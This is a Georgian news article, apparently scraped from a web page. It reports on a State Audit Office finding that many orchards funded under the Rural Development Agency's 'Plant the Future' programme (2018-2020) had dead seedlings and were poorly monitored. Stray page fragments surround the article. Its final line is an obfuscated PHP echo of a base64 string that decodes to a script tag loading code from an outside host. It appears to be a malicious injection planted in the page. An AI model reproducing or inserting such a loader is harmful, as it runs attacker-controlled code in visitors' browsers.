celsiusi
ავერსი შნაიდერი
აუდიტმა სოფლის განვითარების სააგენტოს პროგრამის − „დანერგე მომავალი“ 2018-2020 წლების შესაბამისობის ანგარიში გამოაქვეყნა.
 
ანგარიშში ნათქვამია, რომ აუდიტორული შერჩევით, მნიშვნელოვანი რისკების მქონე ბაღების ადგილზე ვიზუალური დათვალიერების შედეგად გამოვლინდა, რომ 2018-2020 წლებში მოქმედი ხელშეკრულებების ფარგლებში, 1 332 366 ლარით დაფინანსებულ 15 ბაღში ნერგების 100% გამხმარია.
 
ამასთანავე, 10 ბაღის შემთხვევაში, რომლებიც ჯამურად 733 291 ლარით დაფინანსდა, ნერგების გარკვეული ნაწილი ასევე გამხმარია.
 
რაც შეეხება გადარჩენილ ნერგებს, ანგარიშის მიხედვით, 3 115 975 ლარით დაფინანსებულ 36 ბაღში ნერგების არსებითი ნაწილია გახარებული.
 
"სოფლის განვითარების სააგენტოს მიერ არ არის გათვალისწინებული კვლევითი ცენტრის გაცემული რეკომენდაცია გარკვეული კატეგორიის ბაღებში გაძლიერებული მონიტორინგის ჩატარების შესახებ, რაც ბენეფიციარების ინტერესების დაუცველობის და სახსრების არაეფექტიანი ხარჯვის რისკს წარმოქმნის.
 
სააგენტომ ზოგიერთ შემთხვევაში ვერ წარმოადგინა განმეორებითი მონიტორინგის ამსახველი დოკუმენტები; ასევე რიგ შემთხვევებში სააგენტოს სპეციალურმა კომისიამ დააკმაყოფილა ბენეფიციარების მოთხოვნები ვალდებულებების შესრულების ვადების გაგრძელების შესახებ, თუმცა გადაწყვეტილება განმეორებითი მონიტორინგის ჩატარების შესახებ არ იქნა მიღებული.
 
სააგენტოში არ არსებობს ბენეფიციარების მიერ ვალდებულებების შესრულების შემდეგ, გარკვეული პერიოდის განმავლობაში, გაშენებული ბაღების მონიტორინგის პრაქტიკა, რაც საშუალებას მისცემდა, სათანადოდ გაეანალიზებინა პროგრამის განხორციელებით მიღწეული შედეგები. სააგენტო არ ფლობს ინფორმაციას პროგრამის განხორციელებით ბენეფიციარების მიერ მიღებული მოსავლის ან/და შემოსავლების შესახებ", - წერია აუდიტის ანგარიშში.
689
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");